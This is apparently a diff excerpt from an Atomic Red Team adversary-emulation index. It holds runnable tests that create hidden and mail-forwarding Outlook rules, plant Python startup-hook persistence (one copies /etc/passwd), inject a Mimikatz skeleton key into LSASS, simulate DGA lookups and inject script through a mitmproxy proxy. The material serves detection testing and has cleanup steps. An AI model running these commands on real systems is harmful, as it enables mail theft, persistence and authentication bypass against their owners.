COM object model. Uses DeletePermanently as it does not require a resolved
Exchange folder unlike MoveToFolder.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SenderTrigger
trigger_sender:
description: Sender email address that triggers the rule
type: string
default: atomictest@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.From
$cond.Enabled = $true
$cond.Recipients.Add("#{trigger_sender}")
$cond.Recipients.ResolveAll() | Out-Null
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
description: |
Creates an Outlook rule that automatically forwards all received emails to
an external address. Simulates Business Email Compromise (BEC) and insider
threat scenarios where adversaries establish forwarding rules to exfiltrate
mail. One of the most commonly observed real-world abuses of Outlook rules.
Detected by Exchange mail flow anomalies and Microsoft Secure Score
forwarding alerts.
NOTE: No actual email is forwarded during this test - the rule is created
but a trigger email is not sent. Run cleanup immediately after verification.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the forwarding rule
type: string
default: AtomicTest_T1137005_ForwardExfil
forward_to_address:
description: Email address to forward mail to (use a controlled test address)
type: string
default: atomictest-exfil@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$action = $rule.Actions.Forward
$action.Enabled = $true
$action.Recipients.Add("#{forward_to_address}")
$action.Recipients.ResolveAll() | Out-Null
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
description: |
Enumerates all Outlook rules configured on the local profile using the
PowerShell COM object. Simulates the discovery phase where an adversary
audits existing rules before implanting their own, or where a threat actor
tool such as Ruler lists rules to understand the environment. This
enumeration should itself generate telemetry - use it to validate that
your monitoring catches PowerShell spawning Outlook COM for recon purposes.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$rules = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
Write-Host "`n[*] Enumerating Outlook rules on local profile..."
Write-Host " Total rules found: $($rules.Count)`n"
for ($i = 1; $i -le $rules.Count; $i++) {
$r = $rules.Item($i)
Write-Host " Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
}
if ($rules.Count -eq 0) {
Write-Host " (No rules configured)"
}
cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
'
- name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
description: |
Creates an Outlook rule with a zero-width space as its display name,
making it appear blank and invisible in the standard Outlook Rules UI.
Simulates the hidden inbox rule technique documented by Damian Pfammatter
(2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
during casual rule auditing. Tests whether monitoring catches rules that
are invisible in the Outlook GUI but detectable via MFCMapi or
Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
cannot be created programmatically per Microsoft's Rules object model.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
NOTE: Script is written to a temp file before execution to prevent the
ART executor's quote-wrapping from mangling the zero-width space bytes.
supported_platforms:
- windows
input_arguments:
trigger_subject:
description: Subject keyword to trigger the hidden rule
type: string
default: atomic-rt-hidden
sound_file_path:
description: Path to .wav file used as the rule action payload indicator
type: string
default: C:\Windows\Media\notify.wav
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
- description: Sound file must exist for PlaySound action
prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
1 }
'
get_prereq_command: |
Write-Host "[-] Sound file not found at #{sound_file_path}"
Write-Host " Specify a valid .wav file path in the sound_file_path input argument."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$rule = $rules.Create($hiddenName, 0)',
'$cond = $rule.Conditions.Subject',
'$cond.Enabled = $true',
'$cond.Text = @("#{trigger_subject}")',
'$action = $rule.Actions.PlaySound',
'$action.Enabled = $true',
'$action.FilePath = "#{sound_file_path}"',
'$rule.Enabled = $true',
'$rules.Save()',
'Write-Host "[+] Hidden rule created with zero-width space name."',
'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$removed = $false',
'for ($i = $rules.Count; $i -ge 1; $i--) {',
' if ($rules.Item($i).Name -eq $hiddenName) {',
' $rules.Remove($rules.Item($i).Name)',
' $removed = $true',
' }',
'}',
'if ($removed) {',
' $rules.Save()',
' Write-Host "[+] Hidden rule(s) removed."',
'} else {',
' Write-Host "[-] Hidden rule not found - may have already been removed."',
'}'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
atomic_tests: []
T1098.007:
technique:
type: attack-pattern
@@ -73113,7 +71751,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -73149,239 +71787,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -74200,7 +72606,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -74230,54 +72636,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
@@ -77305,7 +75664,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -77332,45 +75691,7 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests:
- name: DGA Simulation (Python)
auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
description: "Simulates Domain Generation Algorithm (DGA) traffic by generating
pseudo-random domains based on the current date and querying them using dig.
\nThis is designed to trigger DNS analytics and NGIDS.\n"
supported_platforms:
- linux
input_arguments:
python_script_path:
description: Full path to the DGA python script
type: string
default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
dependency_executor_name: bash
dependencies:
- description: "#{python_script_path} must exist on system.\n"
prereq_command: 'if [ -f "#{python_script_path}" ]; then exit 0; else exit
1; fi
'
get_prereq_command: |
mkdir -p "$(dirname "#{python_script_path}")"
curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
- description: 'Python 3 must be installed to run the script.
'
prereq_command: 'which python3
'
get_prereq_command: 'sudo apt-get update && sudo apt-get install -y python3
'
executor:
command: 'python3 "#{python_script_path}"
'
name: bash
elevation_required: false
atomic_tests: []
T1071.004:
technique:
type: attack-pattern
@@ -78334,126 +76655,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
